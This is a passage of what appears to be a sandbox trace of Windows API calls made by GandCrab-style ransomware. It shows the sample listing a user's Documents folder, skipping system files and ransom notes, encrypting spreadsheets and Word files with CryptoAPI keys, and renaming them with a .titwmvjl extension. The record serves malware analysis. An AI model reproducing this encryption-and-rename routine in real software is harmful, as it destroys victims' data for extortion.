(lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\desktop.ini") returned 43 [0091.010] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0091.010] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.010] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0091.010] lstrcmpW (lpString1="eYhWJ RqdozFpqHroL5W.xlsx", lpString2=".") returned 1 [0091.010] lstrcmpW (lpString1="eYhWJ RqdozFpqHroL5W.xlsx", lpString2="..") returned 1 [0091.011] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\", lpString2="eYhWJ RqdozFpqHroL5W.xlsx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\eYhWJ RqdozFpqHroL5W.xlsx") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\eYhWJ RqdozFpqHroL5W.xlsx" [0091.011] lstrlenW (lpString=".titwmvjl") returned 9 [0091.011] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\eYhWJ RqdozFpqHroL5W.xlsx") returned 57 [0091.011] VirtualAlloc (lpAddress=0x0, dwSize=0xb2, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0091.011] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\eYhWJ RqdozFpqHroL5W.xlsx.titwmvjl") returned 66 [0091.011] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\eYhWJ RqdozFpqHroL5W.xlsx") returned 57 [0091.011] lstrlenW (lpString=".xlsx") returned 5 [0091.011] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0091.011] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".xlsx ") returned 6 [0091.011] lstrcmpiW (lpString1=".xlsx", lpString2=".titwmvjl") returned 1 [0091.011] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.012] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\eYhWJ RqdozFpqHroL5W.xlsx") returned 57 [0091.012] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\eYhWJ RqdozFpqHroL5W.xlsx") returned 57 [0091.012] lstrcmpiW (lpString1="eYhWJ RqdozFpqHroL5W.xlsx", lpString2="desktop.ini") returned 1 [0091.012] lstrcmpiW (lpString1="eYhWJ RqdozFpqHroL5W.xlsx", lpString2="autorun.inf") returned 1 [0091.012] lstrcmpiW (lpString1="eYhWJ RqdozFpqHroL5W.xlsx", lpString2="ntuser.dat") returned -1 [0091.012] lstrcmpiW (lpString1="eYhWJ RqdozFpqHroL5W.xlsx", lpString2="iconcache.db") returned -1 [0091.012] lstrcmpiW (lpString1="eYhWJ RqdozFpqHroL5W.xlsx", lpString2="bootsect.bak") returned 1 [0091.012] lstrcmpiW (lpString1="eYhWJ RqdozFpqHroL5W.xlsx", lpString2="boot.ini") returned 1 [0091.012] lstrcmpiW (lpString1="eYhWJ RqdozFpqHroL5W.xlsx", lpString2="ntuser.dat.log") returned -1 [0091.012] lstrcmpiW (lpString1="eYhWJ RqdozFpqHroL5W.xlsx", lpString2="thumbs.db") returned -1 [0091.012] lstrcmpiW (lpString1="eYhWJ RqdozFpqHroL5W.xlsx", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0091.012] lstrcmpiW (lpString1="eYhWJ RqdozFpqHroL5W.xlsx", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0091.012] lstrcmpiW (lpString1="eYhWJ RqdozFpqHroL5W.xlsx", lpString2="KRAB-DECRYPT.html") returned -1 [0091.012] lstrcmpiW (lpString1="eYhWJ RqdozFpqHroL5W.xlsx", lpString2="CRAB-DECRYPT.html") returned 1 [0091.012] lstrcmpiW (lpString1="eYhWJ RqdozFpqHroL5W.xlsx", lpString2="KRAB-DECRYPT.txt") returned -1 [0091.012] lstrcmpiW (lpString1="eYhWJ RqdozFpqHroL5W.xlsx", lpString2="CRAB-DECRYPT.txt") returned 1 [0091.012] lstrcmpiW (lpString1="eYhWJ RqdozFpqHroL5W.xlsx", lpString2="ntldr") returned -1 [0091.012] lstrcmpiW (lpString1="eYhWJ RqdozFpqHroL5W.xlsx", lpString2="NTDETECT.COM") returned -1 [0091.012] lstrcmpiW (lpString1="eYhWJ RqdozFpqHroL5W.xlsx", lpString2="Bootfont.bin") returned 1 [0091.012] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\eYhWJ RqdozFpqHroL5W.xlsx") returned 57 [0091.012] lstrlenW (lpString=".xlsx") returned 5 [0091.012] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0091.013] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".xlsx ") returned 6 [0091.013] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.013] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0091.013] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\eYhWJ RqdozFpqHroL5W.xlsx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\eyhwj rqdozfpqhrol5w.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ac [0091.014] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.014] ReadFile (in: hFile=0x2ac, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f470*=0x21c, lpOverlapped=0x0) returned 1 [0091.015] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.015] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.015] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0091.015] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0091.016] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0091.016] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0091.016] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f42c | out: pbBuffer=0x259f42c) returned 1 [0091.016] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.016] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0091.016] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.016] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.017] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0091.017] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0091.017] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0091.018] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0091.018] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f44c | out: pbBuffer=0x259f44c) returned 1 [0091.018] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.018] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0091.018] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.018] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.018] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0091.019] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.019] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x503438) returned 1 [0091.019] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.019] CryptGetKeyParam (in: hKey=0x503438, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0091.019] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.019] CryptEncrypt (in: hKey=0x503438, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0091.020] GetLastError () returned 0x0 [0091.020] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.020] CryptDestroyKey (hKey=0x503438) returned 1 [0091.020] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.020] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0091.020] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.020] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0091.021] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.021] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x503238) returned 1 [0091.021] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.021] CryptGetKeyParam (in: hKey=0x503238, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0091.021] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.021] CryptEncrypt (in: hKey=0x503238, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0091.022] GetLastError () returned 0x0 [0091.022] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.022] CryptDestroyKey (hKey=0x503238) returned 1 [0091.022] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.022] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0091.022] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0091.023] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0091.023] ReadFile (in: hFile=0x2ac, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f470*=0x563, lpOverlapped=0x0) returned 1 [0091.034] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffffa9d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.034] WriteFile (in: hFile=0x2ac, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x563, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f454*=0x563, lpOverlapped=0x0) returned 1 [0091.035] WriteFile (in: hFile=0x2ac, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f454*=0x21c, lpOverlapped=0x0) returned 1 [0091.036] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.039] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.040] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.040] CloseHandle (hObject=0x2ac) returned 1 [0091.040] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\eYhWJ RqdozFpqHroL5W.xlsx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\eyhwj rqdozfpqhrol5w.xlsx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\eYhWJ RqdozFpqHroL5W.xlsx.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\eyhwj rqdozfpqhrol5w.xlsx.titwmvjl"), dwFlags=0x1) returned 1 [0091.041] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.041] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0091.041] lstrcmpW (lpString1="H K80AC.docx", lpString2=".") returned 1 [0091.041] lstrcmpW (lpString1="H K80AC.docx", lpString2="..") returned 1 [0091.041] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\", lpString2="H K80AC.docx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\H K80AC.docx") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\H K80AC.docx" [0091.041] lstrlenW (lpString=".titwmvjl") returned 9 [0091.041] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\H K80AC.docx") returned 44 [0091.041] VirtualAlloc (lpAddress=0x0, dwSize=0x98, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0091.041] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\H K80AC.docx.titwmvjl") returned 53 [0091.041] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\H K80AC.docx") returned 44 [0091.041] lstrlenW (lpString=".docx") returned 5 [0091.041] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0091.042] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".docx ") returned 6 [0091.042] lstrcmpiW (lpString1=".docx", lpString2=".titwmvjl") returned -1 [0091.042] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.042] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\H K80AC.docx") returned 44 [0091.042] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\H K80AC.docx") returned 44 [0091.042] lstrcmpiW (lpString1="H K80AC.docx", lpString2="desktop.ini") returned 1 [0091.042] lstrcmpiW (lpString1="H K80AC.docx", lpString2="autorun.inf") returned 1 [0091.042] lstrcmpiW (lpString1="H K80AC.docx", lpString2="ntuser.dat") returned -1 [0091.042] lstrcmpiW (lpString1="H K80AC.docx", lpString2="iconcache.db") returned -1 [0091.042] lstrcmpiW (lpString1="H K80AC.docx", lpString2="bootsect.bak") returned 1 [0091.042] lstrcmpiW (lpString1="H K80AC.docx", lpString2="boot.ini") returned 1 [0091.042] lstrcmpiW (lpString1="H K80AC.docx", lpString2="ntuser.dat.log") returned -1 [0091.042] lstrcmpiW (lpString1="H K80AC.docx", lpString2="thumbs.db") returned -1 [0091.042] lstrcmpiW (lpString1="H K80AC.docx", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0091.042] lstrcmpiW (lpString1="H K80AC.docx", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0091.042] lstrcmpiW (lpString1="H K80AC.docx", lpString2="KRAB-DECRYPT.html") returned -1 [0091.042] lstrcmpiW (lpString1="H K80AC.docx", lpString2="CRAB-DECRYPT.html") returned 1 [0091.042] lstrcmpiW (lpString1="H K80AC.docx", lpString2="KRAB-DECRYPT.txt") returned -1 [0091.042] lstrcmpiW (lpString1="H K80AC.docx", lpString2="CRAB-DECRYPT.txt") returned 1 [0091.042] lstrcmpiW (lpString1="H K80AC.docx", lpString2="ntldr") returned -1 [0091.042] lstrcmpiW (lpString1="H K80AC.docx", lpString2="NTDETECT.COM") returned -1 [0091.042] lstrcmpiW (lpString1="H K80AC.docx", lpString2="Bootfont.bin") returned 1 [0091.042] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\H K80AC.docx") returned 44 [0091.042] lstrlenW (lpString=".docx") returned 5 [0091.042] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0091.042] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".docx ") returned 6 [0091.043] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.043] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0091.044] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\H K80AC.docx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\h k80ac.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ac [0091.044] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.044] ReadFile (in: hFile=0x2ac, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f470*=0x21c, lpOverlapped=0x0) returned 1 [0091.045] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.045] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.045] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0091.045] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0091.046] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0091.046] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0091.046] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f42c | out: pbBuffer=0x259f42c) returned 1 [0091.046] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.046] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0091.046] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.046] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.046] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0091.046] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0091.047] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0091.047] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0091.047] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f44c | out: pbBuffer=0x259f44c) returned 1 [0091.047] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.047] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0091.047] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.047] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.047] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0091.048] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.048] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x5035b8) returned 1 [0091.048] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.048] CryptGetKeyParam (in: hKey=0x5035b8, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0091.048] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.048] CryptEncrypt (in: hKey=0x5035b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0091.048] GetLastError () returned 0x0 [0091.048] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.049] CryptDestroyKey (hKey=0x5035b8) returned 1 [0091.049] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.049] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0091.049] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.049] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0091.049] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.049] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x5035b8) returned 1 [0091.049] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.050] CryptGetKeyParam (in: hKey=0x5035b8, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0091.050] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.050] CryptEncrypt (in: hKey=0x5035b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0091.050] GetLastError () returned 0x0 [0091.050] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.050] CryptDestroyKey (hKey=0x5035b8) returned 1 [0091.050] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.050] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0091.050] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0091.051] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0091.051] ReadFile (in: hFile=0x2ac, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f470*=0x13e31, lpOverlapped=0x0) returned 1 [0091.062] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffec1cf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.062] WriteFile (in: hFile=0x2ac, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x13e31, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f454*=0x13e31, lpOverlapped=0x0) returned 1 [0091.064] WriteFile (in: hFile=0x2ac, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f454*=0x21c, lpOverlapped=0x0) returned 1 [0091.078] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.083] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.083] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.084] CloseHandle (hObject=0x2ac) returned 1 [0091.084] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\H K80AC.docx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\h k80ac.docx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\H K80AC.docx.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\h k80ac.docx.titwmvjl"), dwFlags=0x1) returned 1 [0091.085] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.086] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0091.086] lstrcmpW (lpString1="iIXvH.xlsx", lpString2=".") returned 1 [0091.086] lstrcmpW (lpString1="iIXvH.xlsx", lpString2="..") returned 1 [0091.086] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\", lpString2="iIXvH.xlsx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\iIXvH.xlsx") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\iIXvH.xlsx" [0091.086] lstrlenW (lpString=".titwmvjl") returned 9 [0091.086] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\iIXvH.xlsx") returned 42 [0091.086] VirtualAlloc (lpAddress=0x0, dwSize=0x94, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0091.086] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\iIXvH.xlsx.titwmvjl") returned 51 [0091.086] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\iIXvH.xlsx") returned 42 [0091.086] lstrlenW (lpString=".xlsx") returned 5 [0091.086] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0091.086] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".xlsx ") returned 6 [0091.086] lstrcmpiW (lpString1=".xlsx", lpString2=".titwmvjl") returned 1 [0091.086] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.087] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\iIXvH.xlsx") returned 42 [0091.087] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\iIXvH.xlsx") returned 42 [0091.087] lstrcmpiW (lpString1="iIXvH.xlsx", lpString2="desktop.ini") returned 1 [0091.087] lstrcmpiW (lpString1="iIXvH.xlsx", lpString2="autorun.inf") returned 1 [0091.087] lstrcmpiW (lpString1="iIXvH.xlsx", lpString2="ntuser.dat") returned -1 [0091.087] lstrcmpiW (lpString1="iIXvH.xlsx", lpString2="iconcache.db") returned 1 [0091.087] lstrcmpiW (lpString1="iIXvH.xlsx", lpString2="bootsect.bak") returned 1 [0091.087] lstrcmpiW (lpString1="iIXvH.xlsx", lpString2="boot.ini") returned 1 [0091.087] lstrcmpiW (lpString1="iIXvH.xlsx", lpString2="ntuser.dat.log") returned -1 [0091.087] lstrcmpiW (lpString1="iIXvH.xlsx", lpString2="thumbs.db") returned -1 [0091.087] lstrcmpiW (lpString1="iIXvH.xlsx", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0091.087] lstrcmpiW (lpString1="iIXvH.xlsx", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0091.087] lstrcmpiW (lpString1="iIXvH.xlsx", lpString2="KRAB-DECRYPT.html") returned -1 [0091.087] lstrcmpiW (lpString1="iIXvH.xlsx", lpString2="CRAB-DECRYPT.html") returned 1 [0091.087] lstrcmpiW (lpString1="iIXvH.xlsx", lpString2="KRAB-DECRYPT.txt") returned 